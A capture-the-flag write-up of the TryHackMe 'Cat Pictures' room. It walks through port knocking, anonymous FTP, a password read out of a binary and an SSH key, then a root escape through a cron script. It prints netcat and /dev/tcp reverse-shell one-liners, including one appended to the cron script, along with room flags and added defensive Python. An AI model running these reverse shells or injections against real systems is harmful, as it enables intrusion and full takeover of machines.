TryHackMe - Cat Pictures - Writeup

I made a forum where you can post cute cat pictures!

Nmap scan

root@ip-10-10-110-58:~# nmap -sCV -A 10.10.42.1 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-07 04:32 BST
Nmap scan report for ip-10-10-33-31.eu-west-1.compute.internal (10.10.42.1)
Host is up (0.00038s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
21/tcp   filtered ftp
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (EdDSA)
8080/tcp open     http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
MAC Address: 02:7B:89:FB:82:F3 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/7%OT=22%CT=1%CU=36977%PV=Y%DS=1%DC=D%G=Y%M=027B89%TM
OS:=60BD9381%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=106%TI=Z%CI=Z%TS=A)
OS:SEQ(SP=106%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M230
OS:1ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)W
OS:IN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F
OS:507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms ip-10-10-33-31.eu-west-1.compute.internal (10.10.42.1)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.49 seconds
root@ip-10-10-110-58:~# 

Port 8080 is running phpBB, so the next step is to find the phpBB version. I searched for a way to find the version manually and found http://10.10.42.1:8080/styles/prosilver/style.cfg, which contains:

phpbb_version = 3.3.3

I found no vulnerability for this version of phpBB. Looking at the forum itself, I found a post: "Knock knock! Magic numbers: 1111, 2222, 3333, 4444".

My thought was: is this hinting at port knocking, using the numbers from the forum post as the sequence? (Learn more about port knocking.)

So I tried knocking with that sequence and ran the nmap scan once again; the FTP port was now open.
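To make clear what the knock actually does on the server side, here is an added example (not knockd's code and not part of the room) that models how a knock daemon tracks each source's progress through the sequence: the ports must be hit in order, within a time window, and a wrong port discards the attempt. The sequence is the one from the forum post; the timeout value and the traffic events are assumed/constructed. Note the caveat this box illustrates: the knocks are plain SYNs and the sequence was readable on a public forum, so knocking hides a port but authenticates nobody.

```python
"""Server-side view of port knocking: how a knock daemon decides a source has
'knocked' correctly. Added illustration; this is not knockd's code and not
part of the TryHackMe room. The sequence is the one from the forum post;
the timeout and the event list are assumed/constructed."""
from typing import Dict, List, Tuple

KNOCK_SEQUENCE = [1111, 2222, 3333, 4444]  # from the "Knock knock!" post
KNOCK_TIMEOUT = 10.0                       # seconds allowed for the whole sequence (assumed)


class KnockMatcher:
    """Tracks, per source address, how far through the sequence it has got."""

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=KNOCK_TIMEOUT):
        self.sequence = list(sequence)
        self.timeout = timeout
        # src -> (index of next expected port, timestamp of first knock)
        self._progress: Dict[str, Tuple[int, float]] = {}

    def observe(self, src: str, dst_port: int, ts: float) -> bool:
        """Feed one inbound SYN. Returns True only when src completes the
        sequence in order and within the timeout (the daemon would then
        add a firewall rule opening the protected port for src)."""
        idx, started = self._progress.get(src, (0, ts))
        if idx > 0 and ts - started > self.timeout:
            idx, started = 0, ts           # too slow: the attempt expires
        if dst_port != self.sequence[idx]:
            self._progress.pop(src, None)  # wrong port: progress is discarded
            return False
        if idx == 0:
            started = ts                   # first correct knock starts the clock
        idx += 1
        if idx == len(self.sequence):
            self._progress.pop(src, None)
            return True
        self._progress[src] = (idx, started)
        return False


# Constructed traffic: one client knocks correctly, one out of order,
# one correctly but too slowly.
CONSTRUCTED_EVENTS: List[Tuple[str, int, float]] = [
    ("10.10.169.134", 1111, 0.0),
    ("10.10.169.134", 2222, 0.5),
    ("10.10.169.134", 3333, 1.0),
    ("10.10.169.134", 4444, 1.5),   # in order -> gate opens
    ("10.10.200.7", 1111, 2.0),
    ("10.10.200.7", 3333, 2.5),     # out of order -> reset
    ("10.10.200.7", 2222, 3.0),
    ("10.10.200.7", 4444, 3.5),
    ("10.10.9.9", 1111, 4.0),
    ("10.10.9.9", 2222, 4.5),
    ("10.10.9.9", 3333, 20.0),      # 16 s after the first knock -> expired
    ("10.10.9.9", 4444, 20.5),
]


def replay(events=CONSTRUCTED_EVENTS) -> List[str]:
    """Run a fresh matcher over the events; return sources that opened the gate."""
    matcher = KnockMatcher()
    return [src for src, port, ts in events if matcher.observe(src, port, ts)]


if __name__ == "__main__":
    print(replay())  # ['10.10.169.134']
```

Only the first client gets through; the out-of-order and the slow client never complete. Real daemons add a per-source firewall rule at that point and usually close it again after a short grace period.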

root@ip-10-10-169-134:~# knock 10.10.42.1 1111 2222 3333 4444
root@ip-10-10-169-134:~# knock 10.10.42.1 1111 2222 3333 4444
root@ip-10-10-169-134:~# knock 10.10.42.1 1111 2222 3333 4444
root@ip-10-10-169-134:~# knock 10.10.42.1 1111 2222 3333 4444
root@ip-10-10-169-134:~# nmap -sCV -A 10.10.42.1 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-07 19:09 BST
Nmap scan report for ip-10-10-42-1.eu-west-1.compute.internal (10.10.42.1)
Host is up (0.00044s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.169.134
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (EdDSA)
8080/tcp open  http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
MAC Address: 02:DF:0D:61:C5:0B (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/7%OT=21%CT=1%CU=36648%PV=Y%DS=1%DC=D%G=Y%M=02DF0D%TM
OS:=60BE60E7%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)
OS:SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M230
OS:1ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)W
OS:IN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F
OS:507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)
OS:T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms ip-10-10-42-1.eu-west-1.compute.internal (10.10.42.1)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.75 seconds
root@ip-10-10-169-134:~# 

Let's log in to FTP anonymously; there is a file named note.txt:

root@ip-10-10-169-134:~# ftp 10.10.42.1
Connected to 10.10.42.1.
220 (vsFTPd 3.0.3)
Name (10.10.42.1:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.00 secs (48.1007 kB/s)
ftp> 

note.txt contains a port number and a password:

root@ip-10-10-169-134:~# cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is sardinethecat.
- catlover

Let's connect to port 4420 with netcat:

nc 10.10.147.150 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted

There is an executable named runme which I can't run from this low-level netcat-based shell. I tried spawning a proper shell but it didn't work; finally the OpenBSD netcat reverse shell worked like a charm.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.169.134 2222 >/tmp/f

Run nc -nlvp 2222 on your host machine, then run the reverse shell command in the internal shell on the target machine.

root@ip-10-10-169-134:~# nc -nlvp 2222
Listening on [0.0.0.0] (family 0, port 2222)
Connection from 10.10.42.1 34558 received!
/bin/sh: 0: can't access tty; job control turned off
# id      
/bin/sh: 1: id: not found
# uname
/bin/sh: 2: uname: not found
# 

Commands like id and uname are disabled. Anyway, let's try to run the file at /home/catlover/runme:

root@ip-10-10-169-134:~# nc -nlvp 2222
Listening on [0.0.0.0] (family 0, port 2222)
Connection from 10.10.42.1 34560 received!
/bin/sh: 0: can't access tty; job control turned off
# /home/catlover/runme
Please enter yout password: sardinethecat
Access Denied
# 

The executable denied the password sardinethecat. As mentioned, several default binaries are disabled, so I could not use strings; instead I used cat on the executable to see whether any readable information could be pulled out of it:

(unprintable bytes omitted) ...[]A\A]A^A_...rebeccaPlease enter yout password: Welcome, catlover! SSH key transfer queued! touch /tmp/gibmethesshkeyAccess Denied;d

The password is the string right before "Please enter yout password": rebecca.
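Reading the password out of the cat output by eye is exactly what the strings tool automates: it prints every run of printable bytes, and a C string literal compiled into a binary shows up as one such run. As an added example (not the room's code), here is a minimal strings equivalent in Python run over a constructed byte blob laid out the way runme's output looked (a secret literal sitting next to the prompt literal); the bytes are made up, not the real binary. The point for a defender is that a credential baked into an executable is recoverable by anyone who can read the file, whether or not strings is installed.

```python
"""Minimal `strings`-style extraction in Python. Added example: not the
room's code; the byte blob is constructed to resemble what cat printed for
runme (a stripped ELF with its C string literals adjacent in .rodata), it is
not the real binary."""
import re
from typing import List, Optional

CONSTRUCTED_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9               # ELF header fragment
    + b"\x48\x89\xe5\x48\x83\xec\x10"                  # some code bytes
    + b"rebecca\x00"                                   # hard-coded secret
    + b"Please enter yout password: \x00"
    + b"\x5b\x5d\x41\x5c\x41\x5d\x41\x5e\x41\x5f\xc3"  # pop rbx..r15; ret ("[]A\A]A^A_")
    + b"Welcome, catlover! SSH key transfer queued!\x00"
    + b"touch /tmp/gibmethesshkey\x00"
    + b"Access Denied\x00"
    + b"\xff\xfe\xfd"
)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of at least min_len printable ASCII bytes, in file order (what
    `strings -n min_len` prints). NUL terminators split adjacent literals
    that a terminal showed glued together."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def string_before(strings: List[str], marker: str) -> Optional[str]:
    """The string immediately preceding the first one that starts with
    marker: how the writeup located the password next to the prompt."""
    for prev, cur in zip(strings, strings[1:]):
        if cur.startswith(marker):
            return prev
    return None


if __name__ == "__main__":
    found = extract_strings(CONSTRUCTED_BINARY)
    for s in found:
        print(repr(s))
    print("candidate:", string_before(found, "Please enter"))
```

The epilogue bytes (pop rbx/rbp/r12..r15; ret) are printable ASCII by coincidence, which is why `[]A\A]A^A_` also showed up in the cat output on the page; raising min_len filters such noise at the cost of short secrets.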

# ./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued!

I think it generates an SSH key; after 2-3 seconds I saw id_rsa in the /home/catlover directory:

# ls -la
total 32
drwxr-xr-x 2 0 0  4096 Jun  7 19:03 .
drwxr-xr-x 3 0 0  4096 Apr  2 20:51 ..
-rw-r--r-- 1 0 0  1675 Jun  7 19:03 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr  3 01:35 runme

Copy the private key into a file on your host machine, make sure you set the id_rsa permissions to 600, and SSH in with it:

root@ip-10-10-169-134:~# chmod 600 id_rsa
root@ip-10-10-169-134:~# ssh -i id_rsa catlover@10.10.42.1
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/# 

Got the first flag from /root:

root@7546fa2336d6:/# id
uid=0(root) gid=0(root) groups=0(root)
root@7546fa2336d6:/root# pwd
/root
root@7546fa2336d6:/root# cat flag.txt
7cf90a0e7c5d25f1a827d3efe6fe4d0edd63cca9

The very first thing I try for privilege escalation is sudo -l, but there is no sudo command available on this machine.

It seems we are in a Docker container, since we got root right away. From previous experience with the Internal machine, which behaved the same way, it turned out to be a Docker container. From a Medium blog post (Learn more: User privileges in Docker containers):

By default, Docker containers run as root.
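Getting root immediately is a hint, not proof; the listing of / further down shows the more reliable tell, a /.dockerenv file. As an added example (not from the room or the linked post), here is a small Python check that combines the indicators a practitioner looks at: /.dockerenv, the cgroup path of PID 1, and what PID 1 actually is. The checks take their inputs as parameters so they run on the constructed samples below; collect_from_host() feeds them the real files.

```python
"""Am I in a container? Added example, not from the room or the linked
Medium post. The checks take their inputs as parameters so they can be run
on constructed data; collect_from_host() feeds them the real files."""
import os
from typing import List

# Substrings that appear in /proc/1/cgroup paths under common runtimes.
CGROUP_MARKERS = ("docker", "containerd", "kubepods", "lxc")
# Names of PID 1 that are normal for a full OS (heuristic; container-specific
# inits such as tini are deliberately not listed so they count as a hit).
HOST_INITS = ("init", "systemd")


def container_indicators(dockerenv_present: bool, cgroup_text: str,
                         pid1_comm: str) -> List[str]:
    """Return human-readable reasons this looks like a container (an empty
    list means none of the tells fired, which is not proof of a real host)."""
    hits: List[str] = []
    if dockerenv_present:
        hits.append("/.dockerenv exists")
    for line in cgroup_text.splitlines():
        if any(marker in line for marker in CGROUP_MARKERS):
            hits.append("cgroup path names a container runtime: " + line.strip())
            break
    if pid1_comm and pid1_comm not in HOST_INITS:
        hits.append(f"PID 1 is '{pid1_comm}', not a host init system")
    return hits


def collect_from_host(root: str = "/") -> List[str]:
    """Gather the real inputs from the running system. root= lets a test
    point at a fake directory tree instead of the live /."""
    def read(rel: str) -> str:
        try:
            with open(os.path.join(root, rel)) as f:
                return f.read()
        except OSError:
            return ""
    return container_indicators(
        os.path.exists(os.path.join(root, ".dockerenv")),
        read("proc/1/cgroup"),   # on cgroup v2 this is often just "0::/" even inside a container
        read("proc/1/comm").strip(),
    )


# Constructed samples (the container id is a placeholder, not the room's).
CONSTRUCTED_CGROUP_CONTAINER = (
    "12:pids:/docker/CONSTRUCTED-CONTAINER-ID\n"
    "1:name=systemd:/docker/CONSTRUCTED-CONTAINER-ID\n"
)
CONSTRUCTED_CGROUP_HOST = "12:pids:/\n1:name=systemd:/init.scope\n"

if __name__ == "__main__":
    print(container_indicators(True, CONSTRUCTED_CGROUP_CONTAINER, "bash"))
    print(container_indicators(False, CONSTRUCTED_CGROUP_HOST, "systemd"))
    print(collect_from_host())
```

None of these indicators is conclusive on its own (images can delete /.dockerenv, cgroup v2 hides the path, a host can run an unusual init), which is why the function reports every tell that fired rather than a yes/no.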

Found a .bash_history file in the root directory:

root@7546fa2336d6:/# ls -la
total 108
drwxr-xr-x   1 root root 4096 Mar 25 16:18 .
drwxr-xr-x   1 root root 4096 Mar 25 16:18 ..
-rw-------   1 root root  588 Jun  4 23:39 .bash_history
-rwxr-xr-x   1 root root    0 Mar 25 16:08 .dockerenv
drwxr-xr-x   1 root root 4096 Apr  9 22:26 bin
drwxr-xr-x   3 root root 4096 Mar 24 04:38 bitnami
drwxr-xr-x   2 root root 4096 Jan 30 17:37 boot
drwxr-xr-x   5 root root  340 Jun  7 16:38 dev
drwxr-xr-x   1 root root 4096 Apr  9 22:26 etc
drwxr-xr-x   2 root root 4096 Jan 30 17:37 home
drwxr-xr-x   1 root root 4096 Sep 25  2017 lib
drwxr-xr-x   2 root root 4096 Feb 18 11:59 lib64
drwxr-xr-x   2 root root 4096 Feb 18 11:59 media
drwxr-xr-x   2 root root 4096 Feb 18 11:59 mnt
drwxrwxr-x   1 root root 4096 Mar 25 16:08 opt
drwxrwxr-x   2 root root 4096 Mar 24 04:37 post-init.d
-rwxrwxr-x   1 root root  796 Mar 24 04:37 post-init.sh
dr-xr-xr-x 127 root root    0 Jun  7 16:38 proc
drwx------   1 root root 4096 Mar 25 16:28 root
drwxr-xr-x   4 root root 4096 Feb 18 11:59 run
drwxr-xr-x   1 root root 4096 Apr  9 22:26 sbin
drwxr-xr-x   2 root root 4096 Feb 18 11:59 srv
dr-xr-xr-x  13 root root    0 Jun  7 16:38 sys
drwxrwxrwt   1 root root 4096 Jun  7 16:39 tmp
drwxrwxr-x   1 root root 4096 Mar 24 04:37 usr
drwxr-xr-x   1 root root 4096 Feb 18 11:59 var
root@7546fa2336d6:/# 

.bash_history contains:

root@7546fa2336d6:/# cat .bash_history
exit
exit
exit
exit
exit
exit
exit
ip a
ifconfig
apt install ifconfig
ip
exit
nano /opt/clean/clean.sh 
ping 192.168.4.20
apt install ping
apt update
apt install ping
apt install iptuils-ping
apt install iputils-ping
exit
ls
cat /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
clear
cat /etc/crontab
ls -alt /
cat /post-init.sh 
cat /opt/clean/clean.sh 
bash -i >&/dev/tcp/192.168.4.20/4444 <&1
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
cat /var/log/dpkg.log 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
exit
exit
exit
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bash

rm -rf /tmp/*
root@7546fa2336d6:/# 

From the history it seems that some cron job runs /opt/clean/clean.sh; I tried cat on the crontab to see which job it is. So our goal is to make sure that this cron job is actually running.

Append this reverse shell to /opt/clean/clean.sh, run nc -nlvp 1234 on your host machine and wait:

echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.169.134/1234 0>&1'" >> clean.sh

After a short while it executed; I got root once again (note the hostname is now cat-pictures rather than the container id) and the root flag:

root@ip-10-10-169-134:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.42.1 35448 received!
bash: cannot set terminal process group (5261): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# whoami
whoami
root
root@cat-pictures:~# cat /root/root.txt
cat /root/root.txt
Congrats!!!
Here is your flag:

4a98e43d78bab283938a06f38d2ca3a3c53f0476
root@cat-pictures:~# 
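The root cause of the final step is a script executed by a root cron job that is writable from a lower-trust context (here, the container). As an added example (not the room's tooling), below is a Python audit that takes a system crontab line, finds the script it runs, flags weak ownership or permissions on the script and its directory, and scans the script for lines that look like the reverse shell appended above. The crontab line and the temporary copy of clean.sh are constructed; demo() recreates the room's situation in a temp directory and demo(hardened=True) shows the same script with sane permissions and no injected line.

```python
"""Audit a cron job's target script for the weakness this room turned on:
a script run by root that a lower-trust context can modify, plus any
reverse-shell-looking lines already in it. Added example, not the room's
own tooling; the crontab line and script below are constructed."""
import os
import re
import stat
import tempfile
from typing import List, Optional, Tuple

# Patterns matching what the writeup's history and clean.sh actually contained.
SUSPICIOUS = [
    re.compile(r"/dev/tcp/\d+\.\d+\.\d+\.\d+/\d+"),
    re.compile(r"\bmkfifo\b.*\bnc\b"),
    re.compile(r"\bnc\b.*\s-e\s"),
]

# System crontab format: five time fields, a user, then the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
INTERPRETERS = ("/bin/bash", "/bin/sh", "/usr/bin/env")


def script_path_from_cron(line: str) -> Optional[Tuple[str, str]]:
    """Return (user, path of the script the job runs), or None for blank or comment lines."""
    if not line.strip() or line.lstrip().startswith("#"):
        return None
    m = CRON_LINE.match(line)
    if not m:
        return None
    tokens = m.group("cmd").split()
    for tok in tokens:                       # skip the interpreter, take the script operand
        if tok.startswith("/") and not tok.startswith(INTERPRETERS):
            return m.group("user"), tok
    return m.group("user"), tokens[0]


def audit_script(path: str, run_as: str) -> List[str]:
    """List the reasons a root-run script is dangerous: writable by others,
    owned by a weaker identity, replaceable via its directory, or already
    carrying a reverse-shell line."""
    findings: List[str] = []
    st = os.stat(path)
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append("group-writable by a non-root group")
    if run_as == "root" and st.st_uid != 0:
        findings.append(f"owned by uid {st.st_uid} but run as root")
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable (script can be replaced)")
    with open(path, errors="replace") as f:
        for n, text in enumerate(f, 1):
            if any(p.search(text) for p in SUSPICIOUS):
                findings.append(f"line {n} looks like a reverse shell: {text.strip()}")
    return findings


def demo(hardened: bool = False) -> List[str]:
    """Recreate the room's setup in a temp dir (constructed): root cron runs
    clean.sh; unhardened, it is mode 777 with a reverse-shell line appended."""
    crontab = "* * * * * root /bin/bash /opt/clean/clean.sh\n"
    user, cron_path = script_path_from_cron(crontab)
    d = tempfile.mkdtemp()
    path = os.path.join(d, os.path.basename(cron_path))
    body = "#!/bin/bash\n\nrm -rf /tmp/*\n"
    if not hardened:
        body += "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.169.134/1234 0>&1'\n"
    with open(path, "w") as f:
        f.write(body)
    os.chmod(path, 0o755 if hardened else 0o777)
    try:
        return audit_script(path, user)
    finally:
        os.remove(path)
        os.rmdir(d)


if __name__ == "__main__":
    print("as in the room:", demo())
    print("hardened:      ", demo(hardened=True))
```

The ownership finding depends on who runs the demo (a file created by a non-root user is reported as "owned by uid N but run as root"), which is the same condition an auditor would flag on a real box: cron executes as root whatever the file's owner is. The fix the room implies is simple: keep root cron scripts owned by root, mode 755 or stricter, outside any volume a container can write.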

Thanks for reading

Room Cat Pictures

Written on June 7, 2021